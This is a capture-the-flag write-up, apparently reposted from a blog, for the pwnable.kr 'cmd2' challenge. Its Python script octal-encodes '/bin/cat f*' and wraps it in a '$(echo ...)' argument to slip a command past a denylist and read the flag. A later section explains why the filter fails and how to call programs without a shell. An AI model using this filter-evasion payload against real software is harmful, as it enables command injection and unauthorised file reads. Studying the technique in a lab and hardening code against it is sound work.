pwnable notes: Toddler's Bottle - cmd2
Source: Internet | Published by: php网站打包app | Editor: 程序博客网 | Time: 2024/06/18 04:33
This challenge's filter is stricter: `/` is filtered as well, which means any input containing a directory path is rejected, so bypassing the filter by string concatenation becomes very hard.
I googled other methods and found that the command can be octal-encoded and then emitted with the `echo` command.
Solution script (run it from /tmp):
#!/usr/bin/python
# Python 2: oct(ord(c)) yields e.g. '057', so each byte becomes a \0nnn escape
# that /bin/sh's echo expands back into the original character.
import subprocess

cmd = "/bin/cat f*"
encode = ""
for c in cmd:
    encode += "\\" + oct(ord(c))
# print encode
# The whole command is passed as a single argument; the filtered characters
# never appear literally, only inside the octal escapes.
args = ["/home/cmd2/cmd2", "$(echo '" + encode + "')"]
# print args[1]
subprocess.Popen(args)
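The reason the bypass works is that the denylist inspects the raw argument while the shell decodes `echo` escapes afterwards, so the check and the interpreter disagree about what the string contains. The following is an added example, not code from the original post or from pwnable.kr: it models a denylist check like the one the post describes (the list itself is constructed here; the post only states that `/` is filtered), expands `\0nnn` escapes the way a POSIX `sh` `echo` does, and shows that the same denylist rejects the argument once it is canonicalised before the check. Function names and the denylist are assumptions for illustration.

```python
import re

# Constructed denylist for the example; the post only says `/` is filtered.
BLOCKED = ("/", "flag")

# \0nnn (or \nnn) with one to three octal digits, as expanded by a POSIX sh echo.
_OCTAL_ESCAPE = re.compile(r"\\0?([0-7]{1,3})")


def octal_encode(s: str) -> str:
    """Encode every byte as a \\0nnn escape (same transformation as the post)."""
    return "".join("\\0%o" % ord(c) for c in s)


def decode_echo_escapes(s: str) -> str:
    """Expand octal escapes into characters, mimicking what /bin/sh echo does."""
    return _OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), s)


def naive_filter(arg: str) -> bool:
    """Weak check: the denylist is applied to the raw argument text."""
    return not any(token in arg for token in BLOCKED)


def canonical_filter(arg: str) -> bool:
    """Same denylist, but applied after the escapes the shell would expand."""
    return naive_filter(decode_echo_escapes(arg))


def assess(arg: str) -> dict:
    """Summarise what each check concludes about one argument."""
    return {
        "raw": arg,
        "decoded": decode_echo_escapes(arg),
        "naive_allows": naive_filter(arg),
        "canonical_allows": canonical_filter(arg),
    }


if __name__ == "__main__":
    # Constructed input shaped like the post's payload.
    payload = "$(echo '" + octal_encode("/bin/cat f*") + "')"
    for key, value in assess(payload).items():
        print("%-17s %s" % (key + ":", value))
```

The canonicalised check only closes this particular gap; the argument still carries a command substitution, and any denylist on shell text will have another encoding it did not anticipate. The durable fix is to never hand the value to a shell: call the target program directly with an argument vector (for example `subprocess.run([...])` with `shell=False`), so `echo` escapes and `$(...)` are never interpreted at all.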